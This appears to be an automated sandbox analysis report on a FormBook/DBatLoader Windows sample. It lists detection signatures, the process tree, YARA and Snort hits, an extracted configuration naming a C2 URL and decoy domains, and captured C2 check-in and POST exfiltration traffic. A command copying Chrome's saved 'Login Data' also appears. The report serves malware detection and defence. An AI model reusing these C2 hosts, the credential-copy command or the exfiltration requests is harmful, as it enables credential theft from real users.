Loading ...

Play interactive tourEdit tour

Windows Analysis Report WZ454554.exe

Overview

General Information

Sample Name:WZ454554.exe
Analysis ID:552851
MD5:58b39c2620cdda3d3fa6a125f476fc9f
SHA1:5d2672c79e9dffb2cdeee0d00e406c03c762985c
SHA256:fdf39d043cc55d6a72b1fe01c9067bb7591d5c379798499148521e6158afeea0
Tags:exeformbook
Infos:

Most interesting Screenshot:

Detection

FormBook DBatLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Detected FormBook malware
Multi AV Scanner detection for submitted file
Yara detected FormBook
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Yara detected DBatLoader
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • WZ454554.exe (PID: 6628 cmdline: "C:\Users\user\Desktop\WZ454554.exe" MD5: 58B39C2620CDDA3D3FA6A125F476FC9F)
    • WZ454554.exe (PID: 6936 cmdline: C:\Users\user\Desktop\WZ454554.exe MD5: 58B39C2620CDDA3D3FA6A125F476FC9F)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • Hyrzbcwcas.exe (PID: 1840 cmdline: "C:\Users\user\Contacts\Hyrzbcwcas.exe" MD5: 58B39C2620CDDA3D3FA6A125F476FC9F)
          • Hyrzbcwcas.exe (PID: 5708 cmdline: C:\Users\user\Contacts\Hyrzbcwcas.exe MD5: 58B39C2620CDDA3D3FA6A125F476FC9F)
        • Hyrzbcwcas.exe (PID: 7108 cmdline: "C:\Users\user\Contacts\Hyrzbcwcas.exe" MD5: 58B39C2620CDDA3D3FA6A125F476FC9F)
          • Hyrzbcwcas.exe (PID: 6340 cmdline: C:\Users\user\Contacts\Hyrzbcwcas.exe MD5: 58B39C2620CDDA3D3FA6A125F476FC9F)
        • help.exe (PID: 6656 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
          • cmd.exe (PID: 4324 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 5628 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • help.exe (PID: 5832 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.spiegelpherese.com/m9g2/"], "decoy": ["pubgnewstatedl.com", "guidedwaveradar.com", "onlineexitpoll.com", "mutationdesign.com", "p60p.com", "xhcaijing.com", "skpcart.store", "houseathomes.com", "thenorthdale.com", "kvkkkararozetleri.com", "formecondominium.com", "7808lll.com", "mitchfletcher.com", "thatsawrapfl.com", "glrinternationalfzco.com", "dbmxkgek.com", "feelingfancy.com", "nishieihuku.com", "newearthhg.com", "tenlog040.xyz", "savche.xyz", "solarofoundation.com", "sk8.network", "schooljoy.net", "ioannismitsialisgerman.online", "hooklinen.com", "gorgeousingems.com", "directusimmigration.com", "nexxt.info", "itecsecure.com", "chairsexpert.com", "yandex-check.online", "ivdripspace.com", "sentlogisticsja.com", "mdk-clothing.com", "quick2repair.net", "thisflippingfamily.com", "lu-dra.xyz", "degenape.art", "evodiocese2022scm.com", "churchofrocknroll.com", "visionaryblock.com", "jornalonlinealagoas.com", "rainbow-of-light.com", "oblical.com", "preserveliqueur.com", "morbidthings.com", "panoramaregency.com", "iphone13promax.review", "gongyingmi.com", "xqzs72.com", "sgmoda.com", "boogiereaper.com", "bitesofwellness.online", "backdad.com", "freeimperia.com", "senerants.tech", "029yu.xyz", "dhakhtar.net", "cnclighting.com", "iplmatchwinner.com", "thpt.space", "naris.net", "hamgirls.com"]}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
WZ454554.exeJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Contacts\sacwcbzryH.urlMethodology_Shortcut_HotKeyDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
    • 0x58:$hotkey: \x0AHotKey=3
    • 0x0:$url_explicit: [InternetShortcut]
    C:\Users\user\Contacts\sacwcbzryH.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
    • 0x14:$file: URL=
    • 0x0:$url_explicit: [InternetShortcut]
    C:\Users\user\Contacts\Hyrzbcwcas.exeJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000015.00000000.416006494.0000000000401000.00000020.00020000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
        0000000A.00000000.360550532.00000000100E2000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
          0000000A.00000000.360550532.00000000100E2000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x16b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x11a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x17b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x192f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x41c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x78f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x890a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          0000000A.00000000.360550532.00000000100E2000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x4819:$sqlite3step: 68 34 1C 7B E1
          • 0x492c:$sqlite3step: 68 34 1C 7B E1
          • 0x4848:$sqlite3text: 68 38 2A 90 C5
          • 0x496d:$sqlite3text: 68 38 2A 90 C5
          • 0x485b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x4983:$sqlite3blob: 68 53 D8 7F 8C
          00000009.00000000.323155523.0000000000401000.00000020.00020000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
            Click to see the 86 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            21.1.Hyrzbcwcas.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
              21.1.Hyrzbcwcas.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
              • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
              • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
              • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
              • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
              • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
              • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
              • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
              • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
              • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
              • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
              • 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
              21.1.Hyrzbcwcas.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
              • 0x18819:$sqlite3step: 68 34 1C 7B E1
              • 0x1892c:$sqlite3step: 68 34 1C 7B E1
              • 0x18848:$sqlite3text: 68 38 2A 90 C5
              • 0x1896d:$sqlite3text: 68 38 2A 90 C5
              • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
              • 0x18983:$sqlite3blob: 68 53 D8 7F 8C
              17.2.Hyrzbcwcas.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
                17.2.Hyrzbcwcas.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
                • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
                • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
                • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
                • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
                • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
                • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
                • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
                • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
                • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
                • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
                • 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
                Click to see the 67 entries

                Sigma Overview

                No Sigma rule has matched

                Jbx Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Found malware configurationShow sources
                Source: 00000014.00000002.559491799.00000000030A0000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.spiegelpherese.com/m9g2/"], "decoy": ["pubgnewstatedl.com", "guidedwaveradar.com", "onlineexitpoll.com", "mutationdesign.com", "p60p.com", "xhcaijing.com", "skpcart.store", "houseathomes.com", "thenorthdale.com", "kvkkkararozetleri.com", "formecondominium.com", "7808lll.com", "mitchfletcher.com", "thatsawrapfl.com", "glrinternationalfzco.com", "dbmxkgek.com", "feelingfancy.com", "nishieihuku.com", "newearthhg.com", "tenlog040.xyz", "savche.xyz", "solarofoundation.com", "sk8.network", "schooljoy.net", "ioannismitsialisgerman.online", "hooklinen.com", "gorgeousingems.com", "directusimmigration.com", "nexxt.info", "itecsecure.com", "chairsexpert.com", "yandex-check.online", "ivdripspace.com", "sentlogisticsja.com", "mdk-clothing.com", "quick2repair.net", "thisflippingfamily.com", "lu-dra.xyz", "degenape.art", "evodiocese2022scm.com", "churchofrocknroll.com", "visionaryblock.com", "jornalonlinealagoas.com", "rainbow-of-light.com", "oblical.com", "preserveliqueur.com", "morbidthings.com", "panoramaregency.com", "iphone13promax.review", "gongyingmi.com", "xqzs72.com", "sgmoda.com", "boogiereaper.com", "bitesofwellness.online", "backdad.com", "freeimperia.com", "senerants.tech", "029yu.xyz", "dhakhtar.net", "cnclighting.com", "iplmatchwinner.com", "thpt.space", "naris.net", "hamgirls.com"]}
                Multi AV Scanner detection for submitted fileShow sources
                Source: WZ454554.exeVirustotal: Detection: 22%Perma Link
                Source: WZ454554.exeReversingLabs: Detection: 39%
                Yara detected FormBookShow sources
                Source: Yara matchFile source: 21.1.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.WZ454554.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.1.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.0.WZ454554.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.1.WZ454554.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.1.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.1.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.0.Hyrzbcwcas.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.0.Hyrzbcwcas.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.WZ454554.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.0.WZ454554.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.1.WZ454554.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.0.Hyrzbcwcas.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.0.Hyrzbcwcas.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000000.360550532.00000000100E2000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.559491799.00000000030A0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.556874060.0000000002B10000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.407793404.00000000005E0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000000.418862410.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.428947591.00000000005A0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.436930793.00000000008F0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000000.419325156.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000000.324007988.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000000.399621636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.436845866.00000000008C0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000001.400349591.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000001.324511598.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.436315053.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000000.400048444.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.407725220.00000000005B0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.429108861.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.437292259.0000000002AD0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.559355148.0000000003070000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000001.419503342.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000000.324380363.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000019.00000002.431106841.0000000003000000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.428671777.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Multi AV Scanner detection for dropped fileShow sources
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeReversingLabs: Detection: 39%
                Source: 9.2.WZ454554.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                Source: 17.1.Hyrzbcwcas.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                Source: 21.1.Hyrzbcwcas.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                Source: 21.2.Hyrzbcwcas.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                Source: 17.2.Hyrzbcwcas.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                Source: 9.1.WZ454554.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                Source: WZ454554.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49746 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49750 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49751 version: TLS 1.2
                Source: Binary string: wntdll.pdbUGP source: WZ454554.exe, 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, WZ454554.exe, 00000009.00000002.409087872.0000000000BAF000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000011.00000002.429687044.0000000000B5F000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000011.00000002.429448664.0000000000A40000.00000040.00000001.sdmp, help.exe, 00000014.00000002.559731759.00000000031E0000.00000040.00000001.sdmp, help.exe, 00000014.00000002.560116485.00000000032FF000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000015.00000002.437079630.0000000000980000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000015.00000003.420862619.00000000007E0000.00000004.00000001.sdmp, Hyrzbcwcas.exe, 00000015.00000002.437691847.0000000000A9F000.00000040.00000001.sdmp, cmd.exe, 00000019.00000002.431480106.00000000037E0000.00000040.00000001.sdmp, cmd.exe, 00000019.00000002.433718675.00000000038FF000.00000040.00000001.sdmp, help.exe, 0000001C.00000002.437536905.00000000033C0000.00000040.00000001.sdmp, help.exe, 0000001C.00000002.437717560.00000000034DF000.00000040.00000001.sdmp
                Source: Binary string: cmd.pdbUGP source: Hyrzbcwcas.exe, 00000011.00000002.432784499.0000000000DD0000.00000040.00020000.sdmp, cmd.exe, 00000019.00000000.427671130.0000000000D80000.00000040.00020000.sdmp, cmd.exe, 00000019.00000002.430750073.0000000000D80000.00000040.00020000.sdmp
                Source: Binary string: wntdll.pdb source: WZ454554.exe, WZ454554.exe, 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, WZ454554.exe, 00000009.00000002.409087872.0000000000BAF000.00000040.00000001.sdmp, Hyrzbcwcas.exe, Hyrzbcwcas.exe, 00000011.00000002.429687044.0000000000B5F000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000011.00000002.429448664.0000000000A40000.00000040.00000001.sdmp, help.exe, 00000014.00000002.559731759.00000000031E0000.00000040.00000001.sdmp, help.exe, 00000014.00000002.560116485.00000000032FF000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000015.00000002.437079630.0000000000980000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000015.00000003.420862619.00000000007E0000.00000004.00000001.sdmp, Hyrzbcwcas.exe, 00000015.00000002.437691847.0000000000A9F000.00000040.00000001.sdmp, cmd.exe, 00000019.00000002.431480106.00000000037E0000.00000040.00000001.sdmp, cmd.exe, 00000019.00000002.433718675.00000000038FF000.00000040.00000001.sdmp, help.exe, 0000001C.00000002.437536905.00000000033C0000.00000040.00000001.sdmp, help.exe, 0000001C.00000002.437717560.00000000034DF000.00000040.00000001.sdmp
                Source: Binary string: help.pdbGCTL source: WZ454554.exe, 00000009.00000002.408113212.0000000000659000.00000004.00000020.sdmp, WZ454554.exe, 00000009.00000002.413836751.0000000002A50000.00000040.00020000.sdmp, Hyrzbcwcas.exe, 00000015.00000002.437020676.0000000000950000.00000040.00020000.sdmp
                Source: Binary string: help.pdb source: WZ454554.exe, 00000009.00000002.408113212.0000000000659000.00000004.00000020.sdmp, WZ454554.exe, 00000009.00000002.413836751.0000000002A50000.00000040.00020000.sdmp, Hyrzbcwcas.exe, 00000015.00000002.437020676.0000000000950000.00000040.00020000.sdmp
                Source: Binary string: cmd.pdb source: Hyrzbcwcas.exe, 00000011.00000002.432784499.0000000000DD0000.00000040.00020000.sdmp, cmd.exe, 00000019.00000000.427671130.0000000000D80000.00000040.00020000.sdmp, cmd.exe, 00000019.00000002.430750073.0000000000D80000.00000040.00020000.sdmp
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 4x nop then pop esi9_2_004172E0
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 4x nop then pop esi9_2_004172F4
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 4x nop then pop ebx9_2_00407B1A
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 4x nop then pop edi9_2_00416CB1
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 4x nop then pop esi17_2_004172E0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 4x nop then pop esi17_2_004172F4
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 4x nop then pop ebx17_2_00407B1A
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 4x nop then pop edi17_2_00416CB1

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 34.102.136.180:80
                Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 34.102.136.180:80
                Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 34.102.136.180:80
                System process connects to network (likely due to code injection or exploit)Show sources
                Source: C:\Windows\explorer.exeDomain query: www.sentlogisticsja.com
                Source: C:\Windows\explorer.exeDomain query: www.senerants.tech
                Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
                C2 URLs / IPs found in malware configurationShow sources
                Source: Malware configuration extractorURLs: www.spiegelpherese.com/m9g2/
                Source: global trafficHTTP traffic detected: GET /m9g2/?xXV=6l9PRhy0D4S&GvW=sz5ErymDSipaI2rGHMiHzQDn8335WrDZWT7fmGUTYuWWeT2KiLBKARdoGEtcQCocu9tS HTTP/1.1Host: www.sentlogisticsja.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: POST /m9g2/ HTTP/1.1Host: www.sentlogisticsja.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.sentlogisticsja.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.sentlogisticsja.com/m9g2/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 47 76 57 3d 6b 52 31 2d 31 57 32 49 66 69 6b 71 56 31 57 2d 65 70 48 42 74 33 28 62 72 55 7a 4b 55 37 33 73 55 55 72 5a 7a 31 55 56 52 74 43 71 61 41 53 53 76 4c 49 55 4f 46 51 61 65 42 4e 34 4d 68 41 52 73 4f 41 4e 32 5a 52 39 72 4c 6a 76 46 4f 65 52 46 6a 6b 6a 32 5f 78 41 44 55 76 5f 67 61 55 64 54 64 53 59 47 77 28 45 41 42 54 74 71 33 73 61 48 7a 5a 54 36 72 5a 53 47 39 4f 6f 6e 51 71 68 52 73 7e 70 63 52 32 34 57 62 6b 79 70 30 32 75 31 4a 4b 49 48 32 47 75 49 6d 5a 42 45 49 42 74 61 79 54 46 49 6a 33 63 31 39 44 6a 6c 72 69 58 6e 45 52 30 61 62 48 7a 61 32 4a 42 79 74 59 6b 4b 6a 50 4c 66 5a 50 74 35 68 79 6a 51 47 32 62 32 64 61 66 6f 49 51 65 4a 4c 59 4e 28 71 59 6b 47 6a 77 35 49 54 4c 4d 51 6f 68 35 4d 77 72 4e 42 63 6b 72 6d 49 34 4c 4e 6c 7e 59 6e 59 6d 34 6c 7a 58 43 6e 37 38 4b 28 36 54 5a 49 30 76 32 5a 74 47 5a 70 67 72 2d 32 38 57 6a 77 61 77 68 50 35 6c 4e 45 6f 42 6b 36 50 4c 78 66 6c 62 49 37 4a 38 73 39 2d 63 6e 51 77 32 53 69 4f 64 59 46 77 28 45 4c 4e 48 75 57 51 45 34 62 69 4d 5a 46 77 54 7a 52 73 4f 52 73 75 76 4a 28 7a 78 46 4d 48 64 37 34 75 39 6c 6c 32 4f 66 71 44 59 78 4b 64 57 51 45 68 30 4a 6e 42 4a 63 69 70 4e 4f 78 37 4d 41 28 71 41 42 49 78 76 76 72 49 6b 4e 6c 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: GvW=kR1-1W2IfikqV1W-epHBt3(brUzKU73sUUrZz1UVRtCqaASSvLIUOFQaeBN4MhARsOAN2ZR9rLjvFOeRFjkj2_xADUv_gaUdTdSYGw(EABTtq3saHzZT6rZSG9OonQqhRs~pcR24Wbkyp02u1JKIH2GuImZBEIBtayTFIj3c19DjlriXnER0abHza2JBytYkKjPLfZPt5hyjQG2b2dafoIQeJLYN(qYkGjw5ITLMQoh5MwrNBckrmI4LNl~YnYm4lzXCn78K(6TZI0v2ZtGZpgr-28WjwawhP5lNEoBk6PLxflbI7J8s9-cnQw2SiOdYFw(ELNHuWQE4biMZFwTzRsORsuvJ(zxFMHd74u9ll2OfqDYxKdWQEh0JnBJcipNOx7MA(qABIxvvrIkNlQ).
                Source: global trafficHTTP traffic detected: POST /m9g2/ HTTP/1.1Host: www.sentlogisticsja.comConnection: closeContent-Length: 149769Cache-Control: no-cacheOrigin: http://www.sentlogisticsja.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.sentlogisticsja.com/m9g2/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 47 76 57 3d 6b 52 31 2d 31 57 43 36 50 43 78 73 52 48 79 37 66 35 58 5a 6e 58 4f 43 36 46 54 56 64 49 6e 53 4f 44 61 65 7a 30 6b 52 65 4f 4b 43 51 41 69 53 6e 70 52 64 44 46 51 5a 59 42 4e 5f 61 52 63 74 79 73 51 37 32 64 68 48 72 4c 62 73 50 76 75 51 46 7a 6c 72 32 66 39 38 46 55 37 76 67 63 55 34 53 34 43 2d 4e 51 37 45 5a 78 37 72 76 6b 6b 52 47 32 70 51 34 62 46 58 45 39 57 78 6e 6a 76 42 53 4a 7e 4c 62 51 61 2d 52 74 6b 44 6d 58 28 78 78 65 75 4d 4a 47 36 74 48 46 6c 53 4b 4c 6c 70 66 33 7a 37 55 78 66 66 72 39 72 6c 67 73 48 71 6a 32 39 6e 59 4c 33 42 61 33 4d 38 71 4c 78 36 59 51 37 54 51 49 44 58 32 30 57 6c 63 56 4f 54 79 66 43 69 71 4c 49 68 4c 4f 6b 53 37 36 46 6b 46 68 59 70 4d 33 6e 6e 57 5a 74 39 5a 53 44 44 41 76 49 6a 7e 34 6f 30 45 48 65 31 74 73 72 33 78 51 37 57 70 37 38 68 7a 61 54 56 51 32 33 4f 4f 36 65 43 6f 67 61 5a 71 2d 33 35 36 70 45 6c 4f 4e 5a 56 42 4c 52 6c 34 66 58 74 51 30 72 77 78 61 51 6c 37 63 41 44 55 77 32 50 6d 4e 31 54 46 77 7e 39 4c 50 75 35 58 68 67 34 62 7a 74 44 49 7a 4c 4a 41 38 4f 51 70 2d 28 4c 6d 77 5a 56 4d 48 46 37 35 62 59 74 33 56 65 66 74 56 63 79 4a 35 43 51 58 42 30 4a 71 68 4a 43 79 4a 67 34 7a 34 63 32 74 4b 67 5a 66 47 65 6f 71 70 42 37 6e 47 67 4e 54 35 44 53 5a 47 52 4f 74 61 4f 79 74 44 41 6d 53 50 71 64 68 65 75 44 4f 46 59 39 49 59 79 48 45 65 4b 2d 7e 73 7e 6a 59 33 4a 5f 48 64 62 68 6e 61 74 45 75 32 59 64 53 5a 47 79 6e 4e 35 55 76 4a 6a 48 4e 78 42 54 45 48 72 71 63 73 68 61 75 42 6d 6e 59 74 4a 73 45 4e 49 2d 64 45 6e 2d 69 6f 32 55 4f 47 4b 65 32 42 4b 